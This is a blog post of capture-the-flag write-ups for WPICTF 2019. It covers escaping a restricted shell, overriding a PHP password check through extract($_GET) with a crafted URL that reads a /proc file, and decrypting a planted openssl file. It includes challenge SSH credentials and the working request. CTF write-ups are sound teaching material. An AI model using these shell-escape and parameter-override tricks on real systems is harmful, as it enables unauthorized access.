---
layout: post
title: "WPICTF 2019 - Write-ups"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - ctf
  - web
  - shell
date: 2019/04/19
thumbnail: /images/ctf.png
authorId: noraj
toc: true
---
## Information

### CTF

- **Name** : WPICTF 2019
- **Website** : [wpictf.xyz](https://wpictf.xyz/)
- **Type** : Online
- **Format** : Jeopardy
- **CTF Time** : [link](https://ctftime.org/event/728)

## 100 - suckmore-shell - Linux

> Here at Suckmore Software we are committed to delivering a truly unparalleled user experience. Help us out by testing our latest project.
>
>    ssh ctf@107.21.60.114
>    pass: i'm a real hacker now
>
> Brought to you by acurless and SuckMore Software, a division of WPI Digital Holdings Ltd.

```
$ ssh ctf@107.21.60.114
ctf@107.21.60.114's password: 
SuckMORE shell v1.0.1. Note: for POSIX support update to v1.1.0
suckmore>alias
alias bash='sh'
alias cat='sleep 1 && vim'
alias cd='cal'
alias cp='grep'
alias dnf=''
alias find='w'
alias less='echo "We are suckMORE, not suckless"'
alias ls='sleep 1'
alias more='echo "SuckMORE shell, v1.0.1, (c) SuckMore Software, a division of WPI Digital Holdings Ltd."'
alias nano='touch'
alias pwd='uname'
alias rm='mv /u/'
alias sh='echo "Why would you ever want to leave suckmore shell?"'
alias sl='ls'
alias vi='touch'
alias vim='touch'
alias which='echo "Not Found"'
suckmore>unalias -a
suckmore>pwd   
/
suckmore>echo /home/*
/home/ctf
suckmore>echo /home/ctf/*
/home/ctf/flag
suckmore>tee</home/ctf/flag
WPI{bash_sucks0194342}
```

## 150 - getaflag - Web

> Come on down and get your flag, all you have to do is enter the correct password ...
>
> http://getaflag.wpictf.xyz:31337/ (or 31338 or 31339)
>
>     made by godeva

`curl http://getaflag.wpictf.xyz:31337/`

```html
<html>
<head>
  <title>WPI CTF</title>
  <link rel="stylesheet"
  href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css"
  integrity="sha384-WskhaSGFgHYWDcbwN70/dfYBj47jz9qbsMId/iRN3ewGhXQFZCSftd1LZCfmhktB"
  crossorigin="anonymous">
  <link href=style.css rel=stylesheet>
</head>
<body>
  <div class="form">
    <h1>GET a <img src="flag.png" alt="Flag Pic" height="42" width="42">?</h1>
    <p>
      All you gotta do is guess the correct password?
    </p>
    
    <form action="#" method="GET">
      <p><input type="text" name="input"></p>
      <p><input class="button" type="submit" value="Enter"></p>
      <!-- SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ== -->
    </form>
    <br>
  </div>
</body>
</html>
```

```
$ printf %s 'SGV5IEdvdXRoYW0sIGRvbid0IGZvcmdldCB0byBibG9jayAvYXV0aC5waHAgYWZ0ZXIgeW91IHVwbG9hZCB0aGlzIGNoYWxsZW5nZSA7KQ==' | base64 -d
Hey Goutham, don't forget to block /auth.php after you upload this challenge ;)
```

`curl http://getaflag.wpictf.xyz:31337/auth.php`

```html
<html>
<head>
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/default.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>
</head>
<body>
  <pre>
    <code class="php">
      // Pseudocode
      $passcode = '???';
      $flag = '????'

      extract($_GET);
      if (($input is detected)) {
        if ($input === get_contents($passcode)) {
          return $flag
        } else {
          echo "Invalid ... Please try again!"
        }
      }
    </code>
  </pre>
</body>
</html>
```

So I did `http://getaflag.wpictf.xyz:31337/?input=1&passcode=/proc/sys/net/ipv4/ip_forward`.

Why? because the content of `/proc/sys/net/ipv4/ip_forward` can only be 1 or 0, so it is easy to guess its content and so having `$input === get_contents($passcode)`. Also `extract($_GET);` will convert all GET param to variables and so we are able to override `$passcode`.

Flag was `WPI{1_l0v3_PHP}` but there was a little troll:

```html
<b>You did it, <a href=https://bit.ly/IqT6zt>click here to get your flag</a></b></p><script type='text/javascript'>
        console.log('Never trust suspicious links');
        console.log('Flag is WPI{1_l0v3_PHP}');
        </script>
```

## 200 - pseudo-random - Linux

>    ssh ctf@prand.wpictf.xyz
>    pass: random doesn't always mean random
>
> made by acurless

```
$ ssh ctf@prand.wpictf.xyz
ctf@prand.wpictf.xyz's password: 
sh-4.4$ file /dev/urandom
/dev/urandom: ASCII text
sh-4.4$ file /dev/random
/dev/random: openssl enc'd data with salted password
sh-4.4$ cat /dev/urandom
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
```

The is not worth the effort to base64 decode it, it is just some random data.

But `/dev/random` is an openssl encrypted file.

```
sh-4.4$ cat /dev/random |base64
U2FsdGVkX1/RPgALW7svzj20wL2rHW27a/7GF4pWkRJT06imCyXthaQnzqoZMEtJV2nm1LNyb+Lb
g5k6CmWkxvGCaYqIscB8p3xbVh+rZcHLPWHa5+q3BMi9VVAFmFKoa56MbKyl0/3mMXya18+VIahM
2/I5o8QlqCiiAUuQuHMk+VUgZl/XzP0gCcdVcOoFJd6PlSPMUR2WpUY/NO8Q8iutjnj3cGPDJvAt
uda3n+ySkytjkdsE0ZoO90uYpS6LljnPZ6GbV4XjuGwy2mAh1t3syBShPkJTqEe/mfRr22Rlz9Hx
g4jbwQjONJVaHOsypBNs/5bHGQ8kKlur7tzrUyjyM21fggq/CpWOtGuAh46odwI0hpcOYGhNZmJp
KeVIBqbLoFqhIeGIpcgRKreZ7kZ3xkVk+2HEhJO3gFzHBV/K9hbnVFdMQkU+Sqrr2rznKIYiiGfe
0Oup6TDdgZkDQM2oezHfb2XSI/3vSSW/AU/rCPRzGiqYK5xEe6efvc3JZPof6a5Al1u5MjUI/+oa
t8vIRpPUzLcmzORydglRd4nVjCRUGnqRO2WYM3O70j8XqgWGPcNXGYXAaYG/y8HSWVaca8+/d2yU
s2ClQCi/h55W3+qBECZpu3mQ9Hzv7Km3sNKDK5iiXHE+PKgHe0stsDWXB4Qx4lnkCTy7OrpkNTT8
7p6UaG0MnIOIukUz0KWG
```

Let's base64 decode the encrypted file and store it in a new file.

```
$ cat random.txt| base64 -d > random.bin
```

Now let's decipher it:

```
$ openssl aes-256-cbc -d -in random.bin -out flag.txt -pass file:urandom.txt 
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
$ cat flag.txt 
Being holy in our church means installing a wholly free operating system--GNU/Linux is a good choice--and not putting any non-free software on your computer. Join the Church of Emacs, and you too can be a saint!
And lo, it came to pass, that the neophyte encountered the Beplattered One and humbly posed the question "Oh great master, is it a sin to use vi?" And St. IGNUcuis dist thus reply unto him, "No, my young hacker friend, it is not a sin. It is a penance."
WPI{@11_Ur_d3v1c3s_r_b3l0ng_2_us}
```
